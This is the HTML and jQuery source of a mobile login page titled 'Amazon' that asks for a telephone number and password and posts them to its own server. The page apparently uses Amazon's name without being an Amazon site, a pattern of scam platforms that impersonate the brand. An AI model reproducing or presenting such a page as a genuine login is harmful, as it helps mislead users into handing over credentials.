<!DOCTYPE html><html lang="en-US" style="--status-bar-height:0px; --top-window-height:0px; --window-left:0px; --window-right:0px; --window-margin:0px; --window-top:calc(var(--top-window-height) + 0px); --window-bottom:0px;"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>Amazon</title><meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0, viewport-fit=cover"><link rel="stylesheet" href="/static/index/css/main.css"><link rel="stylesheet" href="/static/index/css/common.css?v=1"><script src="/static/jquery-3.5.0.min.js"></script><script src="/static/layer/layer.js"></script></head><style>
    .container1{width:100%;height:100vh!important;background:-webkit-gradient(linear,left top,left bottom,from(#0a3cff),to(#0bd3ff));background:-webkit-linear-gradient(top,#0a3cff,#0bd3ff);background:linear-gradient(180deg,#0a3cff,#0bd3ff)}.container1 .title{font-size:36px;font-family:Rubik-BoldItalic,Rubik;font-weight:400;color:#fff;padding:85px 36px}.container1 .wrap{padding:0 32px}.container1 .wrap .item ~ .item{margin-top:8px}.container1 .wrap .item{padding:15px 0;border-bottom:1px solid hsla(0,0%,100%,.4)}.container1 .wrap .item .uni-input-placeholder{font-size:15px;font-family:Rubik-Regular,Rubik;font-weight:400;color:#fff;opacity:.4}.container1 .wrap .item .uni-input-input{font-size:15px;font-family:Rubik-Regular,Rubik;font-weight:400;color:#fff}.container1 .wrap .label{text-align:right;font-size:14px;font-family:Rubik-Regular,Rubik;font-weight:400;color:#fff;margin-top:12px;opacity:.8}.container1 .wrap .btn{height:48px;background:#fff;border-radius:8px;text-align:center;line-height:48px;font-size:15px;font-family:Rubik-Medium,Rubik;font-weight:500;color:#0e73ff;margin-top:40px}.container1 .wrap .btn ~ .btn{margin-top:20px;background:hsla(0,0%,100%,.1);color:#fff}.container1 .wrap .regist{text-align:center;margin-top:20px}.container1 .wrap .regist div{font-size:14px;font-family:Rubik-Medium,Rubik;font-weight:500;color:#fff}
    input::-webkit-input-placeholder {
        color: #87b5f3;
    }
    input::-ms-input-placeholder {
        color: #87b5f3;
    }
    /*语言选择*/
    .selectBoxs{
        background-color: rgb(255, 255, 255);
        padding: 10px;
        line-height: 20px;
        position: absolute;
        top: 20px;
        right: 5px;
        z-index: 19920829;
        border-radius: 3px;
        text-overflow: ellipsis;
        word-break: keep-all;
        overflow: hidden;
        white-space: nowrap;
        border: 0;
        width: 50%;
        color: #989898;
        appearance:none;
        -moz-appearance:none;
        -webkit-appearance:none;
        display: none;
    }
    
</style><body><uni-app class="uni-app--maxwidth"><uni-page data-page="pages/login/index"><uni-page-wrapper><uni-page-body><div class="container1" ><div class="yy" style='float: right;margin: 5%;'>Language</div><div class="van-overlay" style="z-index: 2001; display: none;"></div><div data-v-641a85d2="" role="dialog" aria-labelledby="Por favor seleccione idioma" class="van-dialog" style="width: 80%; z-index: 2002; display: none;" id="language_pop"><div class="van-dialog__header">Please select language</div><div class="van-dialog__content"><div data-v-04afa531="" data-v-641a85d2="" class="language-list"><div data-v-04afa531="" class="d-flex active" onclick="javascript:window.location.href='/index';"><img data-v-04afa531="" src="/static/country/en.jpg"><span data-v-04afa531="">English</span></div><div data-v-04afa531="" class="d-flex" onclick="javascript:window.location.href='/xby';"><img data-v-04afa531="" src="/static/country/xby.jpg"><span data-v-04afa531="">España</span></div><div data-v-04afa531="" class="d-flex" onclick="javascript:window.location.href='/bx';"><img data-v-04afa531="" src="/static/country/bx.jpg"><span data-v-04afa531="">Brasil</span></div><div data-v-04afa531="" class="d-flex" onclick="javascript:window.location.href='/alb';"><img data-v-04afa531="" src="/static/country/alb.jpg"><span data-v-04afa531="">عرب .</span></div><div data-v-04afa531="" class="d-flex" onclick="javascript:window.location.href='/dg';"><img data-v-04afa531="" src="/static/country/dg.jpg"><span data-v-04afa531="">Deutsch</span></div><div data-v-04afa531="" class="d-flex" onclick="javascript:window.location.href='/fg';"><img data-v-04afa531="" src="/static/country/fg.jpg"><span data-v-04afa531="">La France</span></div><div data-v-04afa531="" class="d-flex" onclick="javascript:window.location.href='/teq';"><img data-v-04afa531="" src="/static/country/teq.jpg"><span data-v-04afa531="">Türkiye</span></div><div data-v-04afa531="" class="d-flex" onclick="javascript:window.location.href='/ydl';"><img data-v-04afa531="" src="/static/country/ydl.jpg"><span data-v-04afa531="">Italia</span></div></div></div><div class="van-hairline--top van-dialog__footer"></div></div><div id='xx' class="selectBoxs" style='display: none;'><a href='/index'>English</a>----
                             <!--<a href="/alb">عرب .</a>------><!--<a href="/xby">España</a>------><!--<a href="/bx">Brasil</a>------><!--<a href='/ch'>中文</a>------><!--<a href="/dg">Deutsch</a>------><!--<a href='/fg'>La France</a>------><!--<a href="/hl">Nederland</a>------><!--<a href='/md'>မြန်မာ</a>------><!--<a href="/rd">Sverige</a>------><!--<a href='/ri'>日本</a>------><!--<a href="/teq">Türkiye</a>------><!--<a href='/tg'>ประเทศไทย</a>------><!--<a href="/yd">भारत</a>------><!--<a href='/ydl'>Italia</a>------><!--<a href="/yn">Indonesia</a>------><!--<a href='/yue'>Việt Nam</a>--></div><div class="title">Welcome</div><div class="wrap"><div class="items"><div class="item"><uni-input><div class="uni-input-wrapper"><input name="account" placeholder="Telephone" maxlength="100" step="" enterkeyhint="done" autocomplete="off" type="text" class="uni-input-input"><!----></div></uni-input></div><div class="item"><uni-input><div class="uni-input-wrapper"><input name="password" placeholder="Please enter the password" maxlength="100" step="" enterkeyhint="done" autocomplete="off" type="password" class="uni-input-input"><!----></div></uni-input></div><div class="label"><div><a href="javascript:alert('Please contact customer service')"> Forget the password</a></div></div></div><div class="btn login" style="cursor:pointer;">Login</div><div class="regist"><div class="line"></div><div><a href="/index/login/reg.html">No account, register now</a></div></div><div class="regist"><div class="line"></div></div></div></div><script>
                        $('.yy').click(function(){
                           //$('#xx').show();
                           //$('.yy').hide();
                           $('.van-overlay').show();
                           $('#language_pop').show(50);
                        });
                        $('.van-overlay').click(function(){
                           $('.van-overlay').hide();
                           $('#language_pop').hide();
                        });
                        $('.title').click(function(){
                            $('#xx').hide();
                            $('.yy').show();
                        });
                </script></uni-page-body></uni-page-wrapper></uni-page></uni-app></body></html><script type="text/javascript">
    $(document).on("click", ".login", function () {
        var account = $("input[ name='account']").val();
        var password = $("input[ name='password']").val();
        layer.load(2);
        $.ajax({
            url: "/index/login/index.html",
            type: "post",
            traditional: true,
            data: {account: account, password: password},
            success: function (e) {
                layer.closeAll('loading');
                if (e.code === 1) {
                    layer.msg(e.msg, {
                        end: function () {
                            window.location.href = "/index/index/index.html";
                        }
                    });
                } else {
                    layer.msg(e.msg, function () {
                        return false;
                    });
                }
            },
        });
    });
</script>
